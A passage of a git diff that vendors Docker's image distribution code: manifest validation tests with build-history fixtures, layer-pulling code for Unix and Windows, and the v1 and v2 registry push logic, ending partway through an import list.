"{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ac3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT 
[\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ac3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT 
[\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026 go get -v github.com/tools/godep \\u0026\\u0026 godep restore \\u0026\\u0026 go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain 
--untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" ./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"}, + }, + } + + if err := fixManifestLayers(&duplicateLayerManifest); err == nil || !strings.Contains(err.Error(), "Invalid parent ID.") { + t.Fatalf("expected an invalid parent ID error from fixManifestLayers") + } +} + +// TestValidateManifest verifies the validateManifest function +func TestValidateManifest(t *testing.T) { + // TODO Windows: Fix this unit text + if runtime.GOOS == "windows" { + t.Skip("Needs fixing on Windows") + } + expectedDigest, err := reference.ParseNamed("repo@sha256:02fee8c3220ba806531f606525eceb83f4feb654f62b207191b1c9209188dedd") + if err != nil { + t.Fatal("could not parse reference") + } + expectedFSLayer0 := digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4") + + // Good manifest + + goodManifestBytes, err := ioutil.ReadFile("fixtures/validate_manifest/good_manifest") + if err != nil { + t.Fatal("error reading fixture:", err) + } + + var 
goodSignedManifest schema1.SignedManifest + err = json.Unmarshal(goodManifestBytes, &goodSignedManifest) + if err != nil { + t.Fatal("error unmarshaling manifest:", err) + } + + verifiedManifest, err := verifySchema1Manifest(&goodSignedManifest, expectedDigest) + if err != nil { + t.Fatal("validateManifest failed:", err) + } + + if verifiedManifest.FSLayers[0].BlobSum != expectedFSLayer0 { + t.Fatal("unexpected FSLayer in good manifest") + } + + // "Extra data" manifest + + extraDataManifestBytes, err := ioutil.ReadFile("fixtures/validate_manifest/extra_data_manifest") + if err != nil { + t.Fatal("error reading fixture:", err) + } + + var extraDataSignedManifest schema1.SignedManifest + err = json.Unmarshal(extraDataManifestBytes, &extraDataSignedManifest) + if err != nil { + t.Fatal("error unmarshaling manifest:", err) + } + + verifiedManifest, err = verifySchema1Manifest(&extraDataSignedManifest, expectedDigest) + if err != nil { + t.Fatal("validateManifest failed:", err) + } + + if verifiedManifest.FSLayers[0].BlobSum != expectedFSLayer0 { + t.Fatal("unexpected FSLayer in extra data manifest") + } + + // Bad manifest + + badManifestBytes, err := ioutil.ReadFile("fixtures/validate_manifest/bad_manifest") + if err != nil { + t.Fatal("error reading fixture:", err) + } + + var badSignedManifest schema1.SignedManifest + err = json.Unmarshal(badManifestBytes, &badSignedManifest) + if err != nil { + t.Fatal("error unmarshaling manifest:", err) + } + + verifiedManifest, err = verifySchema1Manifest(&badSignedManifest, expectedDigest) + if err == nil || !strings.HasPrefix(err.Error(), "image verification failed for digest") { + t.Fatal("expected validateManifest to fail with digest error") + } +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_unix.go b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go new file mode 100644 index 0000000000..45a7a0c150 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go @@ -0,0 
+1,13 @@ +// +build !windows + +package distribution + +import ( + "github.com/docker/distribution" + "github.com/docker/distribution/context" +) + +func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) { + blobs := ld.repo.Blobs(ctx) + return blobs.Open(ctx, ld.digest) +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_windows.go b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go new file mode 100644 index 0000000000..aefed86601 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go @@ -0,0 +1,49 @@ +// +build windows + +package distribution + +import ( + "net/http" + "os" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/context" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/distribution/registry/client/transport" +) + +var _ distribution.Describable = &v2LayerDescriptor{} + +func (ld *v2LayerDescriptor) Descriptor() distribution.Descriptor { + if ld.src.MediaType == schema2.MediaTypeForeignLayer && len(ld.src.URLs) > 0 { + return ld.src + } + return distribution.Descriptor{} +} + +func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) { + if len(ld.src.URLs) == 0 { + blobs := ld.repo.Blobs(ctx) + return blobs.Open(ctx, ld.digest) + } + + var ( + err error + rsc distribution.ReadSeekCloser + ) + + // Find the first URL that results in a 200 result code. 
+ for _, url := range ld.src.URLs { + logrus.Debugf("Pulling %v from foreign URL %v", ld.digest, url) + rsc = transport.NewHTTPReadSeeker(http.DefaultClient, url, nil) + _, err = rsc.Seek(0, os.SEEK_SET) + if err == nil { + break + } + logrus.Debugf("Download for %v failed: %v", ld.digest, err) + rsc.Close() + rsc = nil + } + return rsc, err +} diff --git a/vendor/github.com/docker/docker/distribution/push.go b/vendor/github.com/docker/docker/distribution/push.go new file mode 100644 index 0000000000..d35bdb103e --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/push.go @@ -0,0 +1,186 @@ +package distribution + +import ( + "bufio" + "compress/gzip" + "fmt" + "io" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +// Pusher is an interface that abstracts pushing for different API versions. +type Pusher interface { + // Push tries to push the image configured at the creation of Pusher. + // Push returns an error if any, as well as a boolean that determines whether to retry Push on the next configured endpoint. + // + // TODO(tiborvass): have Push() take a reference to repository + tag, so that the pusher itself is repository-agnostic. + Push(ctx context.Context) error +} + +const compressionBufSize = 32768 + +// NewPusher creates a new Pusher interface that will push to either a v1 or v2 +// registry. The endpoint argument contains a Version field that determines +// whether a v1 or v2 pusher will be created. The other parameters are passed +// through to the underlying pusher implementation for use during the actual +// push operation. 
+func NewPusher(ref reference.Named, endpoint registry.APIEndpoint, repoInfo *registry.RepositoryInfo, imagePushConfig *ImagePushConfig) (Pusher, error) { + switch endpoint.Version { + case registry.APIVersion2: + return &v2Pusher{ + v2MetadataService: metadata.NewV2MetadataService(imagePushConfig.MetadataStore), + ref: ref, + endpoint: endpoint, + repoInfo: repoInfo, + config: imagePushConfig, + }, nil + case registry.APIVersion1: + return &v1Pusher{ + v1IDService: metadata.NewV1IDService(imagePushConfig.MetadataStore), + ref: ref, + endpoint: endpoint, + repoInfo: repoInfo, + config: imagePushConfig, + }, nil + } + return nil, fmt.Errorf("unknown version %d for registry %s", endpoint.Version, endpoint.URL) +} + +// Push initiates a push operation on ref. +// ref is the specific variant of the image to be pushed. +// If no tag is provided, all tags will be pushed. +func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushConfig) error { + // FIXME: Allow to interrupt current push when new push of same image is done. + + // Resolve the Repository name from fqn to RepositoryInfo + repoInfo, err := imagePushConfig.RegistryService.ResolveRepository(ref) + if err != nil { + return err + } + + endpoints, err := imagePushConfig.RegistryService.LookupPushEndpoints(repoInfo.Hostname()) + if err != nil { + return err + } + + progress.Messagef(imagePushConfig.ProgressOutput, "", "The push refers to a repository [%s]", repoInfo.FullName()) + + associations := imagePushConfig.ReferenceStore.ReferencesByName(repoInfo) + if len(associations) == 0 { + return fmt.Errorf("An image does not exist locally with the tag: %s", repoInfo.Name()) + } + + var ( + lastErr error + + // confirmedV2 is set to true if a push attempt managed to + // confirm that it was talking to a v2 registry. This will + // prevent fallback to the v1 protocol. + confirmedV2 bool + + // confirmedTLSRegistries is a map indicating which registries + // are known to be using TLS. 
There should never be a plaintext + // retry for any of these. + confirmedTLSRegistries = make(map[string]struct{}) + ) + + for _, endpoint := range endpoints { + if imagePushConfig.RequireSchema2 && endpoint.Version == registry.APIVersion1 { + continue + } + if confirmedV2 && endpoint.Version == registry.APIVersion1 { + logrus.Debugf("Skipping v1 endpoint %s because v2 registry was detected", endpoint.URL) + continue + } + + if endpoint.URL.Scheme != "https" { + if _, confirmedTLS := confirmedTLSRegistries[endpoint.URL.Host]; confirmedTLS { + logrus.Debugf("Skipping non-TLS endpoint %s for host/port that appears to use TLS", endpoint.URL) + continue + } + } + + logrus.Debugf("Trying to push %s to %s %s", repoInfo.FullName(), endpoint.URL, endpoint.Version) + + pusher, err := NewPusher(ref, endpoint, repoInfo, imagePushConfig) + if err != nil { + lastErr = err + continue + } + if err := pusher.Push(ctx); err != nil { + // Was this push cancelled? If so, don't try to fall + // back. + select { + case <-ctx.Done(): + default: + if fallbackErr, ok := err.(fallbackError); ok { + confirmedV2 = confirmedV2 || fallbackErr.confirmedV2 + if fallbackErr.transportOK && endpoint.URL.Scheme == "https" { + confirmedTLSRegistries[endpoint.URL.Host] = struct{}{} + } + err = fallbackErr.err + lastErr = err + logrus.Errorf("Attempting next endpoint for push after error: %v", err) + continue + } + } + + logrus.Errorf("Not continuing with push after error: %v", err) + return err + } + + imagePushConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "push") + return nil + } + + if lastErr == nil { + lastErr = fmt.Errorf("no endpoints found for %s", repoInfo.FullName()) + } + return lastErr +} + +// compress returns an io.ReadCloser which will supply a compressed version of +// the provided Reader. The caller must close the ReadCloser after reading the +// compressed data. 
+// +// Note that this function returns a reader instead of taking a writer as an +// argument so that it can be used with httpBlobWriter's ReadFrom method. +// Using httpBlobWriter's Write method would send a PATCH request for every +// Write call. +// +// The second return value is a channel that gets closed when the goroutine +// is finished. This allows the caller to make sure the goroutine finishes +// before it releases any resources connected with the reader that was +// passed in. +func compress(in io.Reader) (io.ReadCloser, chan struct{}) { + compressionDone := make(chan struct{}) + + pipeReader, pipeWriter := io.Pipe() + // Use a bufio.Writer to avoid excessive chunking in HTTP request. + bufWriter := bufio.NewWriterSize(pipeWriter, compressionBufSize) + compressor := gzip.NewWriter(bufWriter) + + go func() { + _, err := io.Copy(compressor, in) + if err == nil { + err = compressor.Close() + } + if err == nil { + err = bufWriter.Flush() + } + if err != nil { + pipeWriter.CloseWithError(err) + } else { + pipeWriter.Close() + } + close(compressionDone) + }() + + return pipeReader, compressionDone +} diff --git a/vendor/github.com/docker/docker/distribution/push_v1.go b/vendor/github.com/docker/docker/distribution/push_v1.go new file mode 100644 index 0000000000..257ac181ec --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/push_v1.go @@ -0,0 +1,463 @@ +package distribution + +import ( + "fmt" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/image" + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + 
"golang.org/x/net/context" +) + +type v1Pusher struct { + v1IDService *metadata.V1IDService + endpoint registry.APIEndpoint + ref reference.Named + repoInfo *registry.RepositoryInfo + config *ImagePushConfig + session *registry.Session +} + +func (p *v1Pusher) Push(ctx context.Context) error { + tlsConfig, err := p.config.RegistryService.TLSConfig(p.repoInfo.Index.Name) + if err != nil { + return err + } + // Adds Docker-specific headers as well as user-specified headers (metaHeaders) + tr := transport.NewTransport( + // TODO(tiborvass): was NoTimeout + registry.NewTransport(tlsConfig), + registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., + ) + client := registry.HTTPClient(tr) + v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) + if err != nil { + logrus.Debugf("Could not get v1 endpoint: %v", err) + return fallbackError{err: err} + } + p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint) + if err != nil { + // TODO(dmcgowan): Check if should fallback + return fallbackError{err: err} + } + if err := p.pushRepository(ctx); err != nil { + // TODO(dmcgowan): Check if should fallback + return err + } + return nil +} + +// v1Image exposes the configuration, filesystem layer ID, and a v1 ID for an +// image being pushed to a v1 registry. +type v1Image interface { + Config() []byte + Layer() layer.Layer + V1ID() string +} + +type v1ImageCommon struct { + layer layer.Layer + config []byte + v1ID string +} + +func (common *v1ImageCommon) Config() []byte { + return common.config +} + +func (common *v1ImageCommon) V1ID() string { + return common.v1ID +} + +func (common *v1ImageCommon) Layer() layer.Layer { + return common.layer +} + +// v1TopImage defines a runnable (top layer) image being pushed to a v1 +// registry. 
+type v1TopImage struct { + v1ImageCommon + imageID image.ID +} + +func newV1TopImage(imageID image.ID, img *image.Image, l layer.Layer, parent *v1DependencyImage) (*v1TopImage, error) { + v1ID := imageID.Digest().Hex() + parentV1ID := "" + if parent != nil { + parentV1ID = parent.V1ID() + } + + config, err := v1.MakeV1ConfigFromConfig(img, v1ID, parentV1ID, false) + if err != nil { + return nil, err + } + + return &v1TopImage{ + v1ImageCommon: v1ImageCommon{ + v1ID: v1ID, + config: config, + layer: l, + }, + imageID: imageID, + }, nil +} + +// v1DependencyImage defines a dependency layer being pushed to a v1 registry. +type v1DependencyImage struct { + v1ImageCommon +} + +func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) (*v1DependencyImage, error) { + v1ID := digest.Digest(l.ChainID()).Hex() + + config := "" + if parent != nil { + config = fmt.Sprintf(`{"id":"%s","parent":"%s"}`, v1ID, parent.V1ID()) + } else { + config = fmt.Sprintf(`{"id":"%s"}`, v1ID) + } + return &v1DependencyImage{ + v1ImageCommon: v1ImageCommon{ + v1ID: v1ID, + config: []byte(config), + layer: l, + }, + }, nil +} + +// Retrieve the all the images to be uploaded in the correct order +func (p *v1Pusher) getImageList() (imageList []v1Image, tagsByImage map[image.ID][]string, referencedLayers []PushLayer, err error) { + tagsByImage = make(map[image.ID][]string) + + // Ignore digest references + if _, isCanonical := p.ref.(reference.Canonical); isCanonical { + return + } + + tagged, isTagged := p.ref.(reference.NamedTagged) + if isTagged { + // Push a specific tag + var imgID image.ID + var dgst digest.Digest + dgst, err = p.config.ReferenceStore.Get(p.ref) + if err != nil { + return + } + imgID = image.IDFromDigest(dgst) + + imageList, err = p.imageListForTag(imgID, nil, &referencedLayers) + if err != nil { + return + } + + tagsByImage[imgID] = []string{tagged.Tag()} + + return + } + + imagesSeen := make(map[digest.Digest]struct{}) + dependenciesSeen := 
make(map[layer.ChainID]*v1DependencyImage) + + associations := p.config.ReferenceStore.ReferencesByName(p.ref) + for _, association := range associations { + if tagged, isTagged = association.Ref.(reference.NamedTagged); !isTagged { + // Ignore digest references. + continue + } + + imgID := image.IDFromDigest(association.ID) + tagsByImage[imgID] = append(tagsByImage[imgID], tagged.Tag()) + + if _, present := imagesSeen[association.ID]; present { + // Skip generating image list for already-seen image + continue + } + imagesSeen[association.ID] = struct{}{} + + imageListForThisTag, err := p.imageListForTag(imgID, dependenciesSeen, &referencedLayers) + if err != nil { + return nil, nil, nil, err + } + + // append to main image list + imageList = append(imageList, imageListForThisTag...) + } + if len(imageList) == 0 { + return nil, nil, nil, fmt.Errorf("No images found for the requested repository / tag") + } + logrus.Debugf("Image list: %v", imageList) + logrus.Debugf("Tags by image: %v", tagsByImage) + + return +} + +func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.ChainID]*v1DependencyImage, referencedLayers *[]PushLayer) (imageListForThisTag []v1Image, err error) { + ics, ok := p.config.ImageStore.(*imageConfigStore) + if !ok { + return nil, fmt.Errorf("only image store images supported for v1 push") + } + img, err := ics.Store.Get(imgID) + if err != nil { + return nil, err + } + + topLayerID := img.RootFS.ChainID() + + pl, err := p.config.LayerStore.Get(topLayerID) + *referencedLayers = append(*referencedLayers, pl) + if err != nil { + return nil, fmt.Errorf("failed to get top layer from image: %v", err) + } + + // V1 push is deprecated, only support existing layerstore layers + lsl, ok := pl.(*storeLayer) + if !ok { + return nil, fmt.Errorf("only layer store layers supported for v1 push") + } + l := lsl.Layer + + dependencyImages, parent, err := generateDependencyImages(l.Parent(), dependenciesSeen) + if err != nil { + return nil, err 
+ } + + topImage, err := newV1TopImage(imgID, img, l, parent) + if err != nil { + return nil, err + } + + imageListForThisTag = append(dependencyImages, topImage) + + return +} + +func generateDependencyImages(l layer.Layer, dependenciesSeen map[layer.ChainID]*v1DependencyImage) (imageListForThisTag []v1Image, parent *v1DependencyImage, err error) { + if l == nil { + return nil, nil, nil + } + + imageListForThisTag, parent, err = generateDependencyImages(l.Parent(), dependenciesSeen) + + if dependenciesSeen != nil { + if dependencyImage, present := dependenciesSeen[l.ChainID()]; present { + // This layer is already on the list, we can ignore it + // and all its parents. + return imageListForThisTag, dependencyImage, nil + } + } + + dependencyImage, err := newV1DependencyImage(l, parent) + if err != nil { + return nil, nil, err + } + imageListForThisTag = append(imageListForThisTag, dependencyImage) + + if dependenciesSeen != nil { + dependenciesSeen[l.ChainID()] = dependencyImage + } + + return imageListForThisTag, dependencyImage, nil +} + +// createImageIndex returns an index of an image's layer IDs and tags. 
+func createImageIndex(images []v1Image, tags map[image.ID][]string) []*registry.ImgData { + var imageIndex []*registry.ImgData + for _, img := range images { + v1ID := img.V1ID() + + if topImage, isTopImage := img.(*v1TopImage); isTopImage { + if tags, hasTags := tags[topImage.imageID]; hasTags { + // If an image has tags you must add an entry in the image index + // for each tag + for _, tag := range tags { + imageIndex = append(imageIndex, &registry.ImgData{ + ID: v1ID, + Tag: tag, + }) + } + continue + } + } + + // If the image does not have a tag it still needs to be sent to the + // registry with an empty tag so that it is associated with the repository + imageIndex = append(imageIndex, &registry.ImgData{ + ID: v1ID, + Tag: "", + }) + } + return imageIndex +} + +// lookupImageOnEndpoint checks the specified endpoint to see if an image exists +// and if it is absent then it sends the image id to the channel to be pushed. +func (p *v1Pusher) lookupImageOnEndpoint(wg *sync.WaitGroup, endpoint string, images chan v1Image, imagesToPush chan string) { + defer wg.Done() + for image := range images { + v1ID := image.V1ID() + truncID := stringid.TruncateID(image.Layer().DiffID().String()) + if err := p.session.LookupRemoteImage(v1ID, endpoint); err != nil { + logrus.Errorf("Error in LookupRemoteImage: %s", err) + imagesToPush <- v1ID + progress.Update(p.config.ProgressOutput, truncID, "Waiting") + } else { + progress.Update(p.config.ProgressOutput, truncID, "Already exists") + } + } +} + +func (p *v1Pusher) pushImageToEndpoint(ctx context.Context, endpoint string, imageList []v1Image, tags map[image.ID][]string, repo *registry.RepositoryData) error { + workerCount := len(imageList) + // start a maximum of 5 workers to check if images exist on the specified endpoint. 
+ if workerCount > 5 { + workerCount = 5 + } + var ( + wg = &sync.WaitGroup{} + imageData = make(chan v1Image, workerCount*2) + imagesToPush = make(chan string, workerCount*2) + pushes = make(chan map[string]struct{}, 1) + ) + for i := 0; i < workerCount; i++ { + wg.Add(1) + go p.lookupImageOnEndpoint(wg, endpoint, imageData, imagesToPush) + } + // start a go routine that consumes the images to push + go func() { + shouldPush := make(map[string]struct{}) + for id := range imagesToPush { + shouldPush[id] = struct{}{} + } + pushes <- shouldPush + }() + for _, v1Image := range imageList { + imageData <- v1Image + } + // close the channel to notify the workers that there will be no more images to check. + close(imageData) + wg.Wait() + close(imagesToPush) + // wait for all the images that require pushes to be collected into a consumable map. + shouldPush := <-pushes + // finish by pushing any images and tags to the endpoint. The order that the images are pushed + // is very important that is why we are still iterating over the ordered list of imageIDs. + for _, img := range imageList { + v1ID := img.V1ID() + if _, push := shouldPush[v1ID]; push { + if _, err := p.pushImage(ctx, img, endpoint); err != nil { + // FIXME: Continue on error? + return err + } + } + if topImage, isTopImage := img.(*v1TopImage); isTopImage { + for _, tag := range tags[topImage.imageID] { + progress.Messagef(p.config.ProgressOutput, "", "Pushing tag for rev [%s] on {%s}", stringid.TruncateID(v1ID), endpoint+"repositories/"+p.repoInfo.RemoteName()+"/tags/"+tag) + if err := p.session.PushRegistryTag(p.repoInfo, v1ID, tag, endpoint); err != nil { + return err + } + } + } + } + return nil +} + +// pushRepository pushes layers that do not already exist on the registry. 
+func (p *v1Pusher) pushRepository(ctx context.Context) error { + imgList, tags, referencedLayers, err := p.getImageList() + defer func() { + for _, l := range referencedLayers { + l.Release() + } + }() + if err != nil { + return err + } + + imageIndex := createImageIndex(imgList, tags) + for _, data := range imageIndex { + logrus.Debugf("Pushing ID: %s with Tag: %s", data.ID, data.Tag) + } + + // Register all the images in a repository with the registry + // If an image is not in this list it will not be associated with the repository + repoData, err := p.session.PushImageJSONIndex(p.repoInfo, imageIndex, false, nil) + if err != nil { + return err + } + // push the repository to each of the endpoints only if it does not exist. + for _, endpoint := range repoData.Endpoints { + if err := p.pushImageToEndpoint(ctx, endpoint, imgList, tags, repoData); err != nil { + return err + } + } + _, err = p.session.PushImageJSONIndex(p.repoInfo, imageIndex, true, repoData.Endpoints) + return err +} + +func (p *v1Pusher) pushImage(ctx context.Context, v1Image v1Image, ep string) (checksum string, err error) { + l := v1Image.Layer() + v1ID := v1Image.V1ID() + truncID := stringid.TruncateID(l.DiffID().String()) + + jsonRaw := v1Image.Config() + progress.Update(p.config.ProgressOutput, truncID, "Pushing") + + // General rule is to use ID for graph accesses and compatibilityID for + // calls to session.registry() + imgData := &registry.ImgData{ + ID: v1ID, + } + + // Send the json + if err := p.session.PushImageJSONRegistry(imgData, jsonRaw, ep); err != nil { + if err == registry.ErrAlreadyExists { + progress.Update(p.config.ProgressOutput, truncID, "Image already pushed, skipping") + return "", nil + } + return "", err + } + + arch, err := l.TarStream() + if err != nil { + return "", err + } + defer arch.Close() + + // don't care if this fails; best effort + size, _ := l.DiffSize() + + // Send the layer + logrus.Debugf("rendered layer for %s of [%d] size", v1ID, size) + + reader := 
progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, arch), p.config.ProgressOutput, size, truncID, "Pushing") + defer reader.Close() + + checksum, checksumPayload, err := p.session.PushImageLayerRegistry(v1ID, reader, ep, jsonRaw) + if err != nil { + return "", err + } + imgData.Checksum = checksum + imgData.ChecksumPayload = checksumPayload + // Send the checksum + if err := p.session.PushImageChecksumRegistry(imgData, ep); err != nil { + return "", err + } + + if err := p.v1IDService.Set(v1ID, p.repoInfo.Index.Name, l.DiffID()); err != nil { + logrus.Warnf("Could not set v1 ID mapping: %v", err) + } + + progress.Update(p.config.ProgressOutput, truncID, "Image successfully pushed") + return imgData.Checksum, nil +} diff --git a/vendor/github.com/docker/docker/distribution/push_v2.go b/vendor/github.com/docker/docker/distribution/push_v2.go new file mode 100644 index 0000000000..1f8c822fec --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/push_v2.go @@ -0,0 +1,697 @@ +package distribution + +import ( + "errors" + "fmt" + "io" + "runtime" + "sort" + "strings" + "sync" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema1" + "github.com/docker/distribution/manifest/schema2" + distreference "github.com/docker/distribution/reference" + 